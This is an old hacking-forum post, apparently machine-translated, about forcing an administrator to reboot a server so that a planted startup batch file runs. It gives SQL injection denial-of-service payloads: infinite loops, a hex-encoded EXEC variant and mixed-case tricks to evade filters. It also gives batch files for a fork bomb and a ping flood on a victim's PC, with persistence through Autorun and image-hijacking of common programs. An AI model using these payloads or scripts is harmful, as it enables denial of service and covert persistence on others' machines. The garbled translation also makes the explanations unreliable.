Let the administrator help you restart the machine-vulnerability warning-the black bar safety net

2009-09-05T00:00:00
ID MYHACK58:62200924545
Type myhack58
Reporter 佚名
Modified 2009-09-05T00:00:00

Description

Let the administrator help you restart the machine Sometimes, we go through the database backup a batch to the Startup menu, you want the server on the next restart to run our batch processing. But we, Ah, etc., the server is not restarting, what should I do? Allow administrator to help us restart it. Oh The following injection code that makes the server stop responding, or respond very slowly, to achieve better effect, please throw to the injection point after the multi perform a couple of times. Eventually an administrator will restart the server. Numeric injection points: ;wHiLe 1<9 bEgIn select cHaR(0) eNd-- The text type of the injection point: ';wHiLe 1<9 bEgIn select cHaR(0) eNd-- Or to Declare + the EXEC mode to perform: ;dEcLaRe @s vArChAr(8 0 0 0) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)-- ';dEcLaRe @s vArChAr(8 0 0 0) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)-- The above code on the database server, producing an infinite loop cause the server resources are exhausted and thus a denial of service. The administrator will help you restart the server. Note: The code above is offensive, please use caution. Note: select char(0) can be changed to select power(1.23456,1 0 0) in order to increase the amount of calculation. -----------------Clip smoke placeholder-------------------- ;wHiLe 1<9 bEgIn select cHaR(0) eNd-- This sentence means that when 1 small 9 start 0 This inversion of the ASCII code. Because it is a constant established so was a dead circulation. Has been to machine resources exhausted Change character size is in order to bypass website filter anti injection. ;declare @s varchar(8 0 0 0) set @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 exec(@s)-- declare @s varchar(8 0 0 0)defined@s varchar type length 8 0 0 0 it. The“wHiLe 1<9 bEgIn select cHaR(0) eNd”using HEX encoded character value to@s, and then use exec to perform.. The role is also to bypass the website filter anti injection ';wHiLe 1<9 bEgIn select cHaR(0) eNd-- Plus'because he is the character type of the injection. Anyway, I explain the unclear. select power(1.23456,1 0 0)returns 1. 2 3 4 5 6 1 0 0 th root, do not die when pigs fly the concat function is inside the character difference between the size of the series, benchmark(9 9 9 9 9 9 9 9 9 9 9 9 9,md5('test')report the client to run the elapsed time. Blind maybe useful. I don't know the concat function to attack? w hex encoding 0x77 benchmark(9 9 9 9 9 9 9 9 9 9 9 9 9,md5(0x77) so might be able to bypass anti-injection Scrawl a big cow laugh ---------------------------------------------------------------------------------------------------- An infinite loop of ping-enhanced Edition Source: color radish's bolg Suggestions on a virtual machine test Or on someone else's computer to run the modified batch She can make her computer flew can not respond to come And had to restart the machine If you have Poison you can put her in the boot entry in Also Poison words plus an Autorun file, open=this batch path Then the poison while in the registry in the mirror hijack off, so she clicks on QQ, MSN, IE and other commonly used tools To activate the batch Let her toss to go Dual-core is also tested, only restart, reflect response than before simply write a loop would also like to N times Oh Had a chance to knock shutdown-a Close the group and other operations Oh Purely entertainment The system file without harm After the restart inoffensive In the Annex there is my test source file, and lazy, then you can download Oh Attached to the source file contents Note the two files extract to the same directory Start. bat

@echo off color 2f echo. title an infinite loop of ping-enhanced-Edition-zzw production echo#################################################################### echo # an infinite loop of ping-enhanced-Edition-zzw production # echo#################################################################### echo. :loop start zzw. bat goto :loop echo startup completed

zzw. bat

@echo off ping 127.0.0.1-l 6 5 5 0 0-t

Attached to the previous loop batch

@echo off :loop start cmd.exe goto :loop

Of course: someone will ask why not put the CMD. exe into the other app., you can, but only if you want to know her computer has those big applications